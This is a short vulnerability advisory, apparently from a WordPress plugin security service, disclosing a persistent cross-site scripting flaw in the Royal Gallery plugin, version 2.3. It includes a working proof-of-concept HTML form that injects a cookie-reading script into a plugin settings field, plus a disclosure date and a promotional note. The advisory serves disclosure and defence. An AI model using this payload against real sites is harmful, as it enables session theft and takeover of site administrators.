The Royal Gallery plugin has a persistent cross-site scripting (XSS) vulnerability (and possibly other security issues) as of version 2.3. The details of the underlying issue that causes this can be found in our post for the same vulnerability in the plugin Flip Slideshow, which shares the same vulnerable code.

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/admin.php?page=splendidgallery_settings.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=splendidgallery_settings" method="post">
<input type="hidden" name="task" value="save_spg_settings" />
<input type="hidden" name="settings[bannerWidth]" value='"><script>alert(document.cookie);</script>' />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

Timeline

• 6/7/2016 – WordPress.org Plugin Directory notified.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.